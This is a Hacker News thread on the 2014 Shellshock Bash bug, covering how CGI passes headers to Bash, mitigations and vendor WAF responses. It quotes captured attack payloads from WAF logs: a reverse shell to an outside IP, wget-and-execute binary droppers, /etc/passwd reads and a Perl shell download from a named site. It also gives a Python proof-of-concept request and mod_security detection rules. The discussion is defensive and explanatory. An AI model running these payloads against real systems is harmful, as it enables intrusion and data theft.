Hacker News new | past | comments | ask | show | jobs | submit login
Everything you need to know about the Shellshock Bash bug (troyhunt.com)
517 points by sjcsjc on Sept 25, 2014 | hide | past | favorite | 287 comments

This is being actively exploited. We (CloudFlare) put in place WAF rules to block the exploit yesterday and I've been looking at the log files for the blocking to see what's going on. Have been seeing things like:

    () { :;}; /bin/ping -c 1 198.x.x.x
    () { :;}; echo shellshock-scan > /dev/udp/example.com/1234
    () { ignored;};/bin/bash -i >& /dev/tcp/104.x.x.x/80 0>&1
    () { test;};/usr/bin/wget http://example.com/music/file.mp3 -O ~/cgi-bin/file.mp3
    () { :; }; /usr/bin/curl -A xxxx http://112.x.x.x:8011
    () { :; }; /usr/bin/wget http://115.x.x.x/api/file.txt
    () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd
    () { :; }; /bin/bash -c "if [ $(/bin/uname -m | /bin/grep 64) ]; then /usr/bin/wget 82.x.x.x:1234/v64 -O /tmp/.osock; else /usr/bin/wget 82.x.x.x:1234/v -O /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock &
If you are one of our (paying) customers the rules to block this exploit are enabled automatically.

That's very similar to what we are seeing as well:


Also, if anyone need a WAF to protect it in the mean while, we offer one that works very well with CloudFlare (their free plan).

Our team is giving is free for 30 days to help out.

Details: https://sucuri.net/website-firewall/

*Just email info@sucuri.net and they will get you hooked up.


Thank you for that blog post. I managed to retrieve some of them and add a few attack vectors to my checklist: https://jve.linuxwall.info/blog/index.php?post/2014/09/25/Sh...

If you find any more of them, do you think you could publish their checksums?

Out of curiosty: did it cause any problems with intended use of this shell feature? Did anyone complained that it broke something that worked before?

We have not seen any complaints about this.

I assume Cloudflare are filtering HTTP headers. I cannot imagine a valid reason to pass in functions to bash in headers.

And functions with malicious shell script appended at that! ;)

There is no intended use, it's a pure evil bug in bash. I wouldn't be surprised if it was discovered that it has been implanted intentionnally.

How can a bug be evil? Don't attach morals to things which should be amoral.

Its a joke, eval(uate) is evil...

This is guerrilla marketing at its finest, and I mean that in a good way.

Seeing a mix of some that don't do much of anything but I'm starting to see a bunch of new ones using telnet are now starting to pop up.

() { :;}; /bin/bash -c \x22telnet 9999\x22 () { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq

The payloads that don't do much of anything are possibly security researchers or white hats trying to get an idea of the scope of the issue and/or get ahead of this. Ex. http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-in...

Yeah, that's certainly the case with a couple of them and then there's one's like this that are trying to set up shells and where they've been established:

Request of file: /cgi-sys/defaultwebpage.cgi With wget downloading a perl script to launch a shell: () { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\x22

That site is still up and serving right now if anyone wants to take a look.

Same attack hit my server... They're looking for Cpanel sites (defaultwebpage.cgi). Here's a paste of the source in case it goes away:


CloudFlare is so amazing... Thanks for all your hard work. I have over a million blocked malicious attempts on my site which gets a huge amount of traffic (not shellshock, I mean in general).

and if I am not a paying customer, can I enable them manually?

No, the WAF is not included in the free plan.

Out of curiosity, have you considered enabling it temporarily for everyone with Shellshock rules enabled? Just a day or two, to give people time to fix this. Is it feasible with your infrastructure/the way WAF works (I never used one)?

It could do a lot of good for people and be a great PR move at the same time.

I'm going to bring it up internally, but don't hold your breath.

Consider that the bug can be used as an amplification attack and you have a lot of webservers behind the free plan. I'm guessing you don't want to have Cloudflare's infrastructure be the IPs that everyone is blocking because some yoyo is using this to turn those machines into DDOS slaves. Might help your case internally.


EDIT after OP's edit.

Sad. This situation feels kind of a disaster-relief thing; not a good time to think about monetizing it. Still, I do understand you don't want people thinking you'll always be protecting them from everything even if they don't pay.

EDIT2 after clarification downthread, previous edit is to be disregarded.

It's less about trying to monetize it than about the cost to us of suddenly inspecting every request that goes through us. We service a huge volume of traffic and part of our core value is performance so keeping our processing latency is low as possible is important.

(Note: I removed sentence about CloudFlare pricing from previous comment to avoid any confusion about monetization)

Fair enough; that's what I meant when asking if it is feasible for you to do so.

Thank you for clarification!

Would it be possible to enable it temporarily to see whether the change significantly impacts your processing latency?

Or do so on a small percentage of free traffic and see how much CPU headroom you still have left.

The monetization has not been put in place right now. It has always been there (the possibility to add these rules).

If this is a disaster-relief thing-y, CloudFlare should then be eligible to receive government money later. I doubt that would be even considered by any parties.

Follow up: we enabled basic Shellshock protection for everyone.


As a paying customer, I'd like to say thanks. Too many companies give too much away for free, leaving no incentive to upgrade.

Still, publishing suggested rulesets or at least sending them over to OWASP would be Good Guy.

The RedHat advisory had mod_security rules in it. Our rules are our version of that.


    SecRule REQUEST_HEADERS: "^\(\) {" "phase:1,deny,id:1000000,t:urlDecode,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
    SecRule REQUEST_LINE "\(\) {" "phase:1,deny,id:1000001,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
    SecRule ARGS_NAMES "^\(\) {" "phase:2,deny,id:1000002,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
    SecRule ARGS "^\(\) {" "phase:2,deny,id:1000003,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
    SecRule FILES_NAMES "^\(\) {"  "phase:2,deny,id:1000004,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271  - Bash Attack'"

Thanks for sharing this! I've already encountered some skepticism as to the severity of the bug so information like this is very helpful.

Only a few of those look like exploits. A lot of them look like customers testing whether they're vulnerable.

Are you guys at all capable of seeing how far back exploitation of this goes?

No. I only have data for things the WAF blocked.

Paying customers get protection automatically while free customers do not?

I think this is not something which should be treated as a "value-added service" for your paying customers. The health and security of the Internet is far too important.

All your customers should be protected automatically.

P.S. I'm a big fan of Cloudflare.

Read a bit about this because I didn't understand CGI. tl;dr version of what's going on here, if I'm not mistaken (assuming apache/php for this example):

1. Web server (apache) gets request to route to CGI script (PHP)

2. Per the CGI spec, apache passes the request body to PHP as stdin & sets the HTTP headers as environment variables, so PHP can access them

3. In the PHP script, `exec`/`passthru`/`shell_exec` etc. is called to do something in the shell/on the system level. This spawns a new shell (which may be bash)

4. bash interprets the environment variables set by apache

The rub lies in step 4: when bash interprets an environment variable called `HTTP_USER_AGENT` containing the value `() { :;}; /bin/ping -c 1 198.x.x.x` it "gets confused" & interprets that first part (before the second semicolon) as a function, then executes the second part as well

Hopefully this answers the "how does the exploit get from the browser to bash?"

Further question: "If I do not use exec/shell_exec/popen etc, am I still vulnerable (just by virtue of using mod_php)?" AFAICT No, but I am not really sure (I hope someone clears this up).

Additional note about PHP: disabling all these passthru type functions has been recommended for years: http://www.cyberciti.biz/faq/linux-unix-apache-lighttpd-phpi...

Can someone who understands CGI enlighten me why (oh why) everyone treats #4 as the main problem instead of #2 ?

I mean, looking at it from an outside perspective, I can interpret #4 as working as intendeed (attacker calls my shell with arbitrary parameters and, naturally, my shell does arbitrary things controlled by the attacker), and #2 as a total WTF - why is apache passing arbitrary input data to global-scoped (as in, affecting the subsequent bash invocations) environment variables; and can it stop doing it? If not, why is apache passing this data without any verification/sanitization/escaping, and can it stop doing it?

The fixes to the bash flaw seem like a band-aid - if some web service invokes other programs that somehow get called with attacker-defined environment variables, then it seems like a potential for future exploits on other targets than bash; many other things will change their behavior depending on the environment vars.

It's not setting arbitrary environment variables, it's setting specific ones. Bash is basically calling eval on the list of envvars without re-escaping the values.

The people who wrote the CGI spec didn't expect that to happen at startup.

csh and zsh don't do it, and I can't think of any reason why someone would want that.

CGI was always a kludge, and envvars weren't a great choice, but they were presumed to be safe for arbitrary data.

The flaw lies in the combination of 2/3.

The HTTP_ environment variables are user input.

The PHP (or whatever CGI script) should be sanitizing user input before using it.

If this was PHP scripts doing something like this: system("/bin/sh ".$_GET['x']);

Nobody would be freaking out... because that's just stupid.

In your opinion, what is the difference between php blindly passing unsanitized user input onwards to bash, and apache blindly passing unsanitized user input onwards to php?

Furthermore, in the sample attacks the php scripts don't 'use' that user input in any way; bash gets them because, well, it shares the same environment and its variables. If you'd want a php script 'sanitizing' those variables then it would mean checking for any possible HTTP_ environment variables and explicitly altering them even if the script doesn't recognize them - which seems ridiculous as well.

PHP is specifically designed to deal with unsanitized user input.

bash is not, seems pretty obvious

You're missing the point. Look at this code.

  export evil='() { :;}; exit';
  echo $evil
# prints '() { :;}; exit'

# new bash session immediately exits

Imagine a dev using eval() in PHP. The PHP interpreter creates a new environment, executes your (presumably sanitized) code, but also automatically calls eval on every global variable in your app.

That would be a huge bug in PHP, and it's the equivalent of what bash is doing.

Thanks. I'm still confused though:

1: Why does Bash "interpret" the environment variables' values? What is the expected result of setting a function definition as the value of an environment variable? In my worldview (which is clearly wrong) there is no reason for Bash to look at environment variables' values until they're evaluated.

2: This is probably besides the point: but since when is the empty string a valid function name? I can't get Bash to accept "() { :; }" (as opposed to "f() { :; }" as valid bash.

Edit: see my self-reply for answers.

Aha, I found answers here: http://seclists.org/oss-sec/2014/q3/650

Basically, Bash interprets environment variables at start up as a means for you to pass functions into subshells. Whenever an environment variable's value starts with "() {", it is interpreted as a function, which is named according to the environment variable's name.

I guess even without the bug under discussion this feature is a theoretical security flaw. If you set your user agent to "() { ping your.domain.com}", a function named HTTP_USER_AGENT, which pinged your.domain.com would exist in any shellThe name of the function is passed as the Apache spawned. It's not hard to imagine a buggy script accidentally executing it.

As far as I can see, this is largely correct. But do realize:

- that environments are inherited by child processes. - It's not just Web servers that might execute scripts (DHCP could also be vulnerable, SSH with command restrictions, many other things too).

That's the big shitstorm about this bug. It's very hard to determine when you're actually vulnerable. The safest thing to do is to upgrade bash everywhere. But wait! The patches they rolled out don't actually fix the issue all that well. So there's no easy one-stop guide you can follow to fix this. Everybody actually has to think about every single system that might potentially be vulnerable and come up with a good solution all by themselves.

I don't quite get it yet. Let's suppose someone sends a header like this: 'User-Agent:() { :; }; touch /tmp/shellshocked'

Then in my cgi script I do a harmless system('date') call. The file /tmp/shellshocked won't be created right? The file would have been created had I done for example a system('echo $HTTP_USER_AGENT') call. (That is, one needs to explicitly reference the environment variable that gets passed to bash). Is my understanding correct?

No, bash interprets as functions ALL environment variables that begin with '() {' on startup. If you have an unpatched bash it will also excute any trailing commands after the function definition. You don't need to manually reference any environment variables at all to be vulnerable. This is to how the bash feature of exporting functions to subshells ("export -f") works.

This is not my understanding. My understanding is that because this mechanism is intended to pass functions down to the system() call, all environment variables are parsed up front in case they contain any. Because the vulnerability lies in the parsing, it doesn't matter whether you reference the variable in the subsequent shell process or not.

Odd. I am running quite old software:

  echo $0 -> bash
  ls -l /bin/sh -> /bin/bash
  GNU bash, version 3.1.17(2)-release
And I couldn't reproduce the vurnerability in a perl cgi script unless I had explicitly referenced an environment variable in the system() call like I posted above. I thought all versions are vurnerable.

  use strict;
  use warnings;
  use CGI;
  print "Content-Type: text/plain\n\n";

  my $q = CGI->new();

  print "\nHEADERS:\n==============\n";
  my %headers = map { $_ => $q->http($_) } $q->http();
  foreach my $k ( keys %headers ) {
          print "$k\n $headers{$k}\n";

  system("echo hello");

  import socket
  def build_request(meth, host, path, headers=None):
      req = "%s %s HTTP/1.0\r\nHost: %s\r\n" % (meth, path,   host)
      if headers is not None:
          req = req + "\r\n".join(headers) + "\r\n"  
      return req + "\r\n"

  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  ip_addr = 'xxx.xxx.xxx.xxx'
  sock.connect((ip_addr, 80))
  headers = [      
      'User-Agent:() { :; }; /bin/touch /tmp/testshellshock;',  
  req = build_request("GET", ipaddr, "/cgi-bin/test-cgi.pl", headers) 

From "man perlfunc" unser "system":

If there is only one scalar argument, the argument is checked for shell metacharacters, and if there are any, the entire argument is passed to the system's command shell for parsing (this is "/bin/sh -c" on Unix platforms, but varies on other platforms). If there are no shell metacharacters in the argument, it is split into words and passed directly to "execvp", which is more efficient.

So your example does not invoke the shell.

Passing a shell metacharacter to the system function does indeed then trigger the vurnerability. Thanks as I didn't realize it wasn't calling the shell otherwise.

A CGI script may not be PHP - it could actually just be a bash script, perl, whatever.

And regardless, the cgi script could invoke bash, or invoke something that invokes bash, etc.

I'm curious -- is FastCGI vulnerable as well?

My understanding was that although regular CGI respawns the command interpreter every time the web server is queried, FastCGI reuses the same command interpreter and just updates the environment.

I have no sympathy really for people who use `system()`-style calls, or bash in their web servers. Bash is fairly obviously designed with complete disregard for security. I seriously doubt this is its last major flaw.

But anyway, is it really that common? I would have thought most CGI scripts are Python, Perl, PHP, etc. and don't use `system()` type calls. Right?

No, super wrong. Underneath the hood there are all kinds of things that go on and result in system() or similar calls. Think about every module in CPAN / PyPI / whatever. Any non-trivial Web app has a high likelihood of eventually, somehow, somewhere, causing a system() type call to fire off.

This is actually quite common and acceptable if you want to interact with a piece of software for which there is no library or api. One real world example is producing thumbnails from Word documents using Libre Office.

You don't have to do it explicitly either. In Perl, for instance, doing stuff like open($tgz, "|-", "gzip | tar -cvf /tmp/file.tgz"); is going to cause execution of /bin/sh behind the scenes. Assuming that /bin/sh is never called during processing of external requests is risky.

Since the post is relatively non-technical, I'd like to underscore that there are substantial concerns with the original and the followup patch, because with or without it, the underlying bash code parser is still exposed to the Internet. Nobody has posted an RCE vector that would be universally bad for the patched version, but several people have already identified "hmm, that's unexpected" types of global side effects when attacker-controlled strings are parsed as functions by bash. More is likely to come.

As of today, based on our conversations on oss-security, there is a third, unofficial patch that takes a much saner approach of isolating exported functions in a distinct namespace:


Especially in high-value or high-risk scenarios, you may want to give it a try. And if you're interested in the reasons why the original patch is problematic, check out:


The idea of using bash to do anything with input coming from the internet is asking for trouble, really... It's just a flaw with how CGI works generally, and how PHP etc. encourage you to build webapps.

It's the same principle as SQL-injection attacks (and the flaw is there for the same reason! It's the obvious quick solution to just query mysql with "select * from users where username = " . PARAMS['username']....

But this is far more dangerous -- injecting malicious SQL can reveal data, or break things. Injecting malicious bash commands can reconfigure your server to do whatever they like.

I've worked with sysadmins that insisted that CGI be disabled for exactly this reason. If we wanted a dynamic website we needed to use mod_perl or mod_php (it was back in the early 2000s, Rails/Django/nginx hadn't yet been invented). It wasn't a perfect solution - both of them still had plenty of security vulnerabilities - but it cut down the attack surface significantly.

Now I understand what all the security people who said "never use system(). Never, ever" meant.

The dangerous thing is that lots of things that look like a library call to the unwary developer actually call out to other processes (visible if you run strace). This vulnerability will not be limited to web servers, either, and there will likely be systems that escape or unescape parameters in ways that evade app firewall rules.

So trying to understand the issue here, is this actually a bash thing or a problem with the web server forwarding commands to bash? I don't understand why bash would be listening to network traffic on its own.

Not just web servers, but anything that calls system() or popen() is really calling the system shell, /bin/sh. On many systems, /bin/sh is really bash in sh compatability mode. That means all those perl scripts, CGI scripts, even DHCP clients expose the vulnerability. Ubuntu runs dash as /bin/sh instead, and most BSDs run ash, so they're not as vulnerable.

Edit: also, if you have ssh access to a non-login account, like for git access, this could execute commands on the remote host as if you had a shell.

Would a python web server (gunicorn, wsgi) behind nginx be vulnerable to this kind of problem?

I'm just pondering all the python library code out there which relies on calls to subprocess.Popen() to get things done. It seems like dynamic scripting languages with a tendancy to shell out to the system could be at risk of this or similar attacks.

It has to be subprocess.Popen(..., shell=True) to be a problem here, the default is shell=False.

(avoiding implicit shell=True was one of the motivations for the subprocess module)

No, because wsgi (i is for an interface here) does not use shell to pass data. Subprocess.Popen would only be a problem if it passes user-generated data as environment variables, and it doesn't do that by default. That's rarely needed, but you may want to review your code to be sure.

Actually I just tried on an app that runs on Gunicorn and does a Popen with shell=True, and it is vulnerable. A simple curl -A '() { :;}; touch /tmp/owned' did create the file on the server.

That was my first question as well. The behavior sounds like exactly the kind of magical weirdness you get with shells. Your question is asked and answered here: https://stackoverflow.com/questions/26022248/is-the-behavior... The answer given there is that the behavior is NOT a documented feature; it's a side-effect of how bash implements inherited functions.

I was also very confused about why a web server would need to store HTTP headers in environment variables. Why would a mature piece of software like Apache do something so hackish? The explanation turns out to be very simple: it's how CGI works. Headers are passed to the CGI script as environment variables. If you don't do it that way, you don't support CGI.

There's one thing that still confuses me, though: why would a CGI implementation use the shell to set environment variables? Why would you use a complex, idiosyncratic piece of software that comes in many different flavors instead of just using the C setenv function?

Apache isn't setting CGI variables using the shell. It may call a shell (indirectly or directly) when executing the CGI script.

So does that mean that running a bash script under cgi doesn't inherently expose you to the vulnerability, you're vulnerable only if the bash script called invokes a shell in a sub-process?

If you're running a bash script as a cgi script in your web server, you're already vulnerable in half a dozen ways. Nobody does that.

If you're running a php/perl/python/ruby script as a cgi script in your web server, and that script calls system() or some variant thereof (backticks in perl, os.system in python), then you're vulnerable to this.

Not many people does that, but those who do won't be things you think of as web applications. They're going to be web control panels you installed and forgot about, or cheap home routers that nobody knows who made the firmware to.

No, running a bash script through CGI is definitely dangerous. What's safe is if your CGI handler is a non-bash program like PHP that reads the environment variables itself and doesn't itself pass those environment variables on to bash.

> why would a CGI implementation use the shell to set environment variables?

This is exactly my question; that, and: if this is so, then isn't any script that uses mod_cgi (e.g., PHP, Perl, etc.) vulnerable? Yet there are multiple statements that only cgi scripts written in bash are vulnerable.

I haven't been able to resolve this apparent inconsistency in the description of how the bug works in the case of CGI, which may be a critical factor in understanding ones own vulnerability. What exactly is the order of execution here in the case of mod_cgi?

Those statements aren't correct. A ShellShock exploit has two steps:

1. Attacker somehow gets to set an environment variable. Since CGI converts HTTP headers to env vars (Host: -> HTTP_HOST, etc), a CGI-enabled server is an easy way to make this happen.

Step 1 on its own would be alarming but ultimately harmless--the variables may contain malicious values, but they can't be used to hurt you if you treat them as untrusted or don't even read them. But since this is *nix, those possibly malicious vars will be inherited by children spawned by the affected process.

If one of those children is Bash, then (regardless of the shell command):

2. When starting up, the Bash process will parse the currently defined environment for things that look like functions and import them. The "ShellShock" portion of this bug is that the parser will keep parsing past the function's closing brace, which means it runs whatever trailing code might be there. Of that trailing code was set by an attacker, with the expectation that you'd start a vulnerable Bash, you're owned.

So every time Bash is launched, for any reason, it spins through all of the environment variables and executes anything it finds as long as it's preceded by a fairly simple pattern?

To me, what seems disturbing isn't the extent of the vulnerability, but how long it took for someone to notice it. How many other "shallow" bugs like this one have been missed by the proverbial many eyes?

In principle it shouldn't execute anything, it's only supposed to parse functions. The problem is that it's such an obscure feature I bet almost no-one knew it existed, the many eyes didn't exist in this case.

Statement #2 is the simple expression of the issue that's necessary for understanding it, notably missing or obfuscated in all the other massive verbiage on the topic today.

Thank you, gentle responder.

Seriously, for an "Everything you need to know about X" post, they're very light on the details of what exactly makes a web server vulnerable.

If you run CGI you may be/probably are.

Honestly, I'm having trouble seeing how this is the end of the world vulnerability that it's being hyped as.

There are a TON Of servers out there running PHP through good ole CGI. I would imagine that some of those are running web apps that lots and lots of people use. Meaning you now have shell access to those machines.

Mining username/passwords is probably going to be pretty simple. I wonder how many of these machines have credit card numbers stored in the clear? I'd bet that there's a bank somewhere running in exactly that configuration.

It's a big deal.

This is "end of the world" mostly because of all the "things" (a la "Internet of things") like toasters, microwaves, refrigerators, etc. all have vulnerable bash versions.

Its a bash thing, or more specifically, the issue is with the fact that many (mostly old) web applications/web servers pass content from user straight to bash as environment variables, not expecting this to cause any problems.

To clarify further: it's a bash thing, because the arbitrary code execution happens when bash parses environment variables.

The latter. Some daemons, like CGI scripts will spawn a shell populated with environment variables from the client. With a vulnerable bash, commands in these get executed.

A little more accurately and pedantically:

All HTTP servers invoking scripts over the Common Gateway Interface (CGI) put user-supplied input into environment variables as part of their invocation process, because that's what the CGI spec says to do. Many other daemons perform similar techniques to communicate with subprocesses that they spawn to do work. And when launching a new process, environment variables are (by default) copied from the parent process.

The CGI script itself is neither a daemon nor responsible for populating the environment (merely for invoking system()). Also, most HTTP servers try to go out of their way to avoid invoking shells and instead invoke CGI scripts directly, saving on overhead.

More broadly, if ANY process puts ANY client-supplied input into environment variables and subsequently that process or a subprocess happens to spawn a copy of bash by calling system(3), then you're in trouble.

Skimming this post, it appears to only reference CVE-2014-6271 and not CVE-2014-7169, so probably not 'everything you need to know'.

(Searching for '=>' doesn't show anything, which I would expect it to if -7169 was mentioned.)

Unless I've missed something, could some benevolent person use the bug to cause remote systems to run something like "sudo apt-get update && sudo apt-get install bash", to patch the vulnerability automatically? (it makes lots of assumptions, but surely it's better to have some patched systems as a result.)

Certain worms include a patching step like this when they infect a machine to avoid losing control via re-infection.

For a high school science research course I did an epidemiological modeling study on how "good" reverse-worms might affect the spread of infection, they're a pretty interesting thought experiment. With something involving exponential growth like this, early movers have a significant advantage.

As far as I know, there hasn't been a successful reverse-worm that did not accidentally cause worse issues (flooding local networks with a high density set of boxes doing over-zealous scanning, or accidentally destroying boxes due to a slapdash narrowly tested script).

Reverse-worms they can either wait around, detecting requests from infected-but-not-patched systems to re-infect and patch them—or just start scanning IP ranges themselves. The former feels somewhat less pernicious. "Try to infect this computer, you will be patched and help patch." But that relies on other worms not patching their zombies.

It may be possible to exploit the bug for "good" reasons like patching the bug, but the patches that are out now don't seem to properly plug the exploit, and as with any update there are plenty of considerations that could end up bricking the application.

Aside from the "it's not yours to fix" angle, you have to weigh the moral benefits of possibly patching the exploit, possibly crashing the application (I bet this is much more likely than a successful fix at this point), and wait-and-seeing whether the application owner patches the exploit on their own (along with the risk of a compromise in the mean time).

Edit: Of course there are a slew of legal issues with attempting this as well.

"could some benevolent person use the bug to cause remote systems to run something like "

That's not benevolent that's intrusion. Nobody has the right to take it upon themselves to determine what someone else should be doing in this case. I would imagine that an action like that would also clearly violate a law or two (I'm sure others more knowledgeable could cite the law).

At the risk of participating in a philosophical debate, I pose a classic counterexample:

You encounter a car parked on the side of the road in the middle of nowhere. Its windows are rolled down. Storm clouds are rumbling nearby and it's obviously about to rain. There's nobody around but you.

Do you also consider rolling up the windows to be intrusion?

Personally I'd feel an ethical obligation to help the stranger out by preventing damage to his/her property. However I can completely understand people leaving well-enough alone.

Law aside, I'm much more on the fence about people automatically scanning for and "fixing" vulnerabilities, however. On one hand, how do you know you're really helping? On the other, as someone who's maintained a server or two, I'd rather be solving problems caused by a well-intentioned whitehat than miss problems caused by ill-intentioned blackhats.

"Do you also consider rolling up the windows to be intrusion?"

Yes definitely. Really no different than if you would want someone to enter your house to close your windows.

Now you might say "well what if it can be done from the outside" without entering?

That is a bit different.

Except for one thing. What if someone saw you doing that? What if the owner saw you doing that and didn't know why you were messing with their car? (I had this happen with a boat one time btw.). There is an immediately sense of shock because you don't know what is going on. And in that case who knows what will happen? Maybe they might start a fight or shoot you. That's not good for anyone. Maybe they have something valuable in the car that they think you are going after. Maybe they have serious mental problems.

Here's the point. It's one thing if you see a baby in a hot car and decide to take action. The benefit outweighs the risks. But it's another thing if you decide to roll up the windows to prevent someone's car from getting wet inside (covered by homeowners insurance with low deductible in many cases ntim though). Different story. Make sense?

Depends on if it has power windows ;)

Better to use:

echo You are vulnerable to shellshock | wall

sudo requires a password to be entered by default, right? I would guess that for most setups this wouldn't be possible without some kind of privilege escalation as well (or if the webserver was running with root privileges).

You'd be surprised by the number of servers that don't ask for password when you try to use sudo. They just assume that the actual owner issued the command and go straight to issuing the command as root.

(Caveat: typically it has to be a certain user)

I'm ashamed to admit I used to think that was convenient. It makes systems infinitely more vulnerable in the event of an RCE bug.

Many systems still use passwordless sudo to permit certain users to run specific commands -- but now, if those commands are shell scripts run via bash, the users can execute arbitrary commands (this isn't an uncommon class of privilege escalation problem, though).

and how would the "benign attacker" know the super user password that sudo will ask for? its not like this is a logged in ssh session.

sudo can be set up lots of different ways -- including such that there's no password needed.

> its not like this is a logged in ssh session

That's not correct -- whatever user is executing your CGI scripts is the "logged-in" user in bash, right?

Obviously that user should be quite locked down, and should not be allowed to run sudo at all, let alone without a password... but there are so many amateur server admins out there that I imagine there are quite a few servers where this is a serious problem (with or without sudo access enabled for the executing user).

Extremely good point, thank you. :)

If you're running Apache on Linux/UNIX, and don't absolutely need CGI, it's straightforward to turn it off in Apache.

Put a "#" in front of

LoadModule cgi_module modules/mod_cgi.so

in /etc/httpd/conf/httpd.conf. This prevents the code that runs CGI scripts from even being loaded with Apache, and will totally disable all CGI scripts. Apache is willing to execute CGI scripts from far too many directories, and many Linux distros have some default CGI scripts lying around.

This will break CPanel, but not non-CGI admin tools such as Webmin. I can't say anything about PHP; we don't use it.

People are out there probing. This is from an Apache server log today from a dedicated server I run. - - [24/Sep/2014:23:08:56 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 338 "-" "() { :;}; /bin/ping -c 1"

The source is on "i3d.net", which is a hosting service in Rotterdam NL. So someone is running probes from something bigger than a desktop. I sent their support people a note.

For Windows devs: remember that some tools and libraries come with bash (and some may not even tell you explicitly).

For instance, msysgit has the vulnerability[1]:

  $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  this is a test

[1] from the comments on the blog in the OP

Can confirm the same for Github for Windows (msysgit again), Chef for Windows (embedded bash) as well as Cygwin's bash

okay after more tests on the latest version of win-bash I can confirm that it is vulnerable.

For Mac OS X, until Apple releases a software update, I've applied the original CVE-2014-6271 (shellshock) patch and am going to apply the CVE-2014-7169 patch as well once it passes review. Repository and instructions to reproduce without trusting me are located here:


I've updated this to the latest patch which covers CVE-2014-7169.

why not simply chmod 0000 `which bash` ?

The problem is that some utilities rely heavily on bashisms such that they're unlikely to work with dash or other POSIX-compliant sh-replacements. As an Arch user, just off the top of my head, I can think of yaourt (AUR helper) and apparently the shell script for invoking gradle as both reliant on such behavior. The latter may not affect everyone, and after running into just those two samples today, I can only imagine what else may be affected.

The best solution I could think of as a work around is to install dash, replace the /bin/sh symlink pointing to dash, and then chown/chmod bash so that only those specific users who need to use it can use it. This isn't perfect, because it could still be affected by web services that run as users that would then have access to bash via their member group(s), or because a web service might rely on another application that itself requires specific bashisms in order to function.

This is why abandoning correctness for convenience can be dangerous.

This isn't really enough because /bin/sh is also a copy of bash (not a symlink).

A question worth asking: how long has this been exploited? If you have years of Apache logs, go back through them with "grep" and look for attempts to exploit this vulnerability. Report the earliest date on which you find a hit. Thanks.

It would be really nice if log aggregation services (Splunk, Loggly, Papertrail, etc) would do this, notify affected customers, and publicly release anonymized information about it.

Default apache log doesn't show the contents of HTTP headers I believe.

So if your server is set up with limited permissions for the apache-user, are you still at risk?

I don't think the apache-user if properly restricted can write to directories, or even read most of the system files?

Things like that lower the risk: run everything as a low-privilege account (better, not even www-data but per-site), chroot()-ed, etc. and certain classes of attack will either fail or at least be easier to clean up.

The problem with all of this is that it assumes that you don't have privilege escalation vulnerabilities on the local system, which is often not the case unless non-trivial effort has gone into hardening the server – e.g. all of that privilege separation is a waste if someone sledgehammer-ed a chmod 777 into a script rather than setting the appropriate ownership and permissions or someone delayed a kernel update because they didn't want the downtime and “knew” that only trusted code ran on that system.

Apache user can probably write to /tmp, and from there the attacker can construct a way into the system (bindshell, reverse shell). He can then start reading your PHP config files (db passwords) or try to use other vulnerabilities to escalate his privileges.

It can read your application source code, read your database credentials, access your database, and exfiltrate its contents. Yes, you are at risk.

It doesn't seem to have trouble writing to /tmp in a typical low access scenario. Seems to me, anything can write to /tmp. Default seems to be 777 on /tmp.

I had someone exploit my Pydio install a few months ago with a litecoin miner. He managed to drop and run it in /tmp. He probably couldn't write and execute to too many other places.

From the article, it sounds like the issue is not just with Apache but also ssh, DHCP and others. So I'd just assume you're still at risk regardless of your Apache user configuration. (in any case, it's safer to act as if)

Isn't it kind of a security best practice to assume your web user can be compromised and plan accordingly with permissions?

From the article:

"Of course one means of mitigating this particular attack vector is simply to disable any CGI functionality that makes calls to a shell"

If you're on Ubuntu:

    a2dismod cgi
    service apache2 restart
If you're NOT running any CGI scripts this will disable CGI support in Apache. Not sure if that takes care of things 100%, but might be helpful.

If you're on Ubuntu or Debian your CGI scripts will probably use dash, not bash.

I've just our few Apache 2 systems that are Internet facing. Some of the site configs did have the standard Ubuntu CGI stanzas in them. However, the `/usr/lib/cgi-bin` directories were empty.

All this has made me a bit nervous though. I certainly didn't change the system to use bash instead of dash.

Debian yes, Ubuntu's default is bash. So is Mint's.

On Ubuntu, /bin/sh is a symlink to dash. /bin/sh is what system() will invoke.

It is, however when you create a user its default shell is bash unless otherwise specified.

Of course, but what's the exploit vector in that case?

That the users created for Apache, database daemons, etc, default to bash for cgi.

The passwd file contains the login shell configured for that user. Operating in the context of a daemon for most sane applications, this configuration doesn't (or shouldn't?) matter unless the user logs in. [1]

For Apache, I believe /bin/sh (or the shell it points to) is what's at issue here. [2]

[1] http://unix.stackexchange.com/questions/38175/difference-bet...

[2] http://security.stackexchange.com/questions/68146/how-do-i-s...

(This is also discussed earlier in the thread.)

Apache uses APR, which is a separate package/set of packages to the webserver proper. Depends on the distro how this works exactly. See for instance https://launchpad.net/ubuntu/precise/+source/apr-util

Unless the distro changes it, APR defines SHELL_PATH as a macro pointing to /bin/sh (note this isn't the homonym env variable, that would be a serious problem if it was since shellshock allows setting env variables by other means that are very public by now).

In a system I have access to, the installation procedure for some servers (not webserver necessarily) includes creating users with a full environment to be able to issue commands for these servers at a higher privilege. At the creation of these users, Ubuntu Server assigned them bash as their shell. I wonder if they're attackable at their public ports, but I haven't bothered trying to find attacking vectors since they were in production and the sysadmin got rid of bash as soon as he could. Not giving much detail here since I assume there will be plenty of compromised servers in the wild right now, including DB servers, proxies, etc.

init scripts will probably run from dash[1]

[1] https://wiki.ubuntu.com/DashAsBinSh

Erm what about mod_php etc?

from my understanding mod_php is not affected. However, if you have any system() calls in your PHP code AND you allow user input to be used in those system calls, then /bin/bash could be executed via the system call. If you control what is running in your system call - i.e.

    system("echo 'hello world'");
then I believe you are OK. But that's "security 101" and you should never be opening a system call to user input.

> AND you allow user input to be used in those system calls

This is not required for exploiting the vulnerability at hand.

